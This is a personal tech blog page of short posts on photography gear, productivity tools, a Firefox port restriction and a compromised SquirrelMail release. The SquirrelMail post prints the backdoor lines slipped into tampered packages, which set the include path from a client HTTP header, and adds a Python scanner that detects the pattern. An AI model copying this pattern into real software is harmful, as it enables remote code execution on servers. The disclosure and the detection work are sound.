TheGeekery

The Usual Tech Ramblings

Ice-cream-sphere cloud

A little bit of a mouthful, and rather nerdy, but works pretty well. Gary Fong developed a Lightsphere Cloud, but I was resourceful, and constructed one from an ice cream container. I don’t even remember what ice-cream it was, but the container was the rigid semi-transparent plastic. I removed all the stickers, and labels. I then took my SB800 and traced a line in the lid around the SB800, and cut it out using a knife. When used (I’ll get some pictures of that later), it creates a nice even light source.

New Year's resolutions

I’ve never been very good at keeping them, so I generally don’t try and make them. Instead, this year, I’m setting myself a couple of small goals..

I think that covers all my basic goals for this year. Some are pretty easy (take a picture daily), others might take a little more motivation (gym).

Hehe

So, I couldn’t help but laugh… Of course, I’m a nerd, which explains it all… xkcd always seem to have some interesting stuff, but this one made me chuckle…

Oh, and happy new year.

Wake-On-LAN

I’ve recently been toying with the idea of setting up a schedule for my home servers to be up. As the only time I really use them is whilst at work (to stream music from), I considered a simple script to power them down at a set time (18:00), and power it up before I head to work. The problem is, I have a terrible memory, so I’m likely to forget to power the server up on the way out the door. Another solution was needed…

Flash, and something new...

Ever tried to figure out how to get the perfect exposure? Old time photography pros probably already know all about the Guide Number, but Strobist has a quick guide to the “Guide Number”. It’s a handy bit of information, and I had a play with it this evening. You can dial in the f-stop you want on the flash, the power level, and the ISO, and it’ll tell you how far from the subject the flash should be. For example, on my SB-800, when set to ISO200, and 1/16th power, 50mm zoom, and f8, it says I should put the flash 2m away from the subject. Pretty nifty stuff. He even put up an image of an SB800 dialed in.

Productivity Tweaks...

A few months ago Lifehacker tipped me off to an interesting app called Launchy. It’s a pretty handy application, allowing you to keep your hands on your keyboard to launch applications, and, if you follow Lifehacker, with a few tweaks, you can make it do a whole lot more.

Well, they just released version 2, which includes a new configuration dialog, and a new interface. It’s a handy little tool, and I’d recommend it for those that like to stay away from their mouse as much as possible, or even feel more comfortable at the keyboard. Hitting ALT + Space (configurable), you can type in the name of any app that is on your start menu, and launch it. Sort of similar to Mac’s QuickSilver.

SquirrelMail 1.4.13 Released

Shortly after we released 1.4.12, somebody reported that the package didn’t match our checksum for it. This is not a good sign, so we set out to find out what might have happened. It turns out that one of the package managers had their account compromised, and the files released in 1.4.11, and 1.4.12, were modified after they were released.

The file change was quite tiny, 3 additional lines of code (and an additional one for a comment)…

/** set the value of the base path */
if (isset($_SERVER['HTTP_BASE_PATH'])) {
    define('SM_PATH',$_SERVER['HTTP_BASE_PATH']);
}

Initial views on the code change showed this shouldn’t be able to do anything, because HTTP_BASE_PATH wasn’t a defined variable. That’s where the problem is. Entries in $_SERVER that begin with HTTP_ are populated by the web server from the headers of the incoming request, which means that the remote user can set them via the HTTP transaction, and PHP will load them. This is a bad thing, because SM_PATH, the base path, is then whatever the remote user supplied, so the next page loaded would really be loaded from the remote host. This then allows the user to execute malicious PHP code, as the webserver user, on the victim’s host, without any interaction with the victim at all.

Because of this, instead of redeploying the packages (which we initially did), we decided to pull both 1.4.11, and 1.4.12 from the site, and deploy 1.4.13.
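
A check that could be run over an unpacked release to catch this kind of change, as an added example (not SquirrelMail's own code): it flags constants defined from client-supplied HTTP_* entries of $_SERVER and any include/require that then uses them. The two sample files and the require_once line are constructed for the demo; only the four inserted lines come from the post.

```python
import re

# $_SERVER keys that start with HTTP_ are filled from request headers (client-controlled).
CLIENT_VAR = re.compile(r"""\$_SERVER\[\s*['"]HTTP_\w+['"]\s*\]""")
DEFINE = re.compile(r"""\bdefine\(\s*['"](\w+)['"]\s*,\s*(.+?)\)\s*;""")
INCLUDE = re.compile(r"""\b(?:include|require)(?:_once)?\b\s*\(?\s*(.+?);""")

def scan_php(source):
    """Return [(line_no, rule, name)] for header values that reach define()/include."""
    tainted, findings = set(), []
    for no, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith(("//", "#", "/*", "*")):
            continue  # comment-only line
        m = DEFINE.search(line)
        if m and CLIENT_VAR.search(m.group(2)):
            tainted.add(m.group(1))  # constant now carries a client-supplied value
            findings.append((no, "define-from-header", m.group(1)))
            continue
        m = INCLUDE.search(line)
        if not m:
            continue
        expr = m.group(1)
        hdr = CLIENT_VAR.search(expr)
        if hdr:  # header value used directly in the include path
            findings.append((no, "include-from-header", hdr.group(0)))
        for const in sorted(tainted):
            if re.search(r"\b%s\b" % re.escape(const), expr):
                findings.append((no, "include-uses-tainted-constant", const))
    return findings

# Constructed samples: the tampered one embeds the inserted lines quoted in the post.
SAMPLE_TAMPERED = """<?php
/** set the value of the base path */
if (isset($_SERVER['HTTP_BASE_PATH'])) {
    define('SM_PATH',$_SERVER['HTTP_BASE_PATH']);
}
require_once(SM_PATH . 'functions/strings.php');
"""
SAMPLE_CLEAN = """<?php
define('SM_PATH','../');
require_once(SM_PATH . 'functions/strings.php');
"""

if __name__ == "__main__":
    for finding in scan_php(SAMPLE_TAMPERED):
        print(finding)
```

The scan is line-based and per-file, so it complements rather than replaces comparing every released file against a checksum published through a separate channel.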

Firefox "security"

Due to deployment times, we often have to make quick changes before other departments can catch up. One such example is IP deployments. It can take the corporate network team 48+ hours to get us a new IP address. This means to get a new site up and running quickly, we have to use a different port on a web server for initial testing. When attempting to test this new port in Firefox, Firefox popped up an interesting error, one I’ve not seen before…

This address is restricted: This address uses a network port which is normally used for purposes other than Web browsing. Firefox has cancelled the request for your protection.

What? The site was running on port 79, so I know it was non-standard, but why did you block access? It never blocked access before, and I’ve used some weird ports before. I did a port 8000 passthru on my firewall at home, that works. Port 8000 isn’t normally used for web browsing, but proxying (slightly different).

A quick google shows this feature can be turned off using the about:config, more details can be found here on Scott Salyer’s blog. He also rants that this seems to be a relatively stupid feature, as well as a few others mentioned on his blog, namely Scott Bellware, and Sam Gentile, who also seem to dislike stupid security features.

[EDIT] As it appears the servers have vanished for Scott Salyer’s blog, a new link to here with details on how to resolve.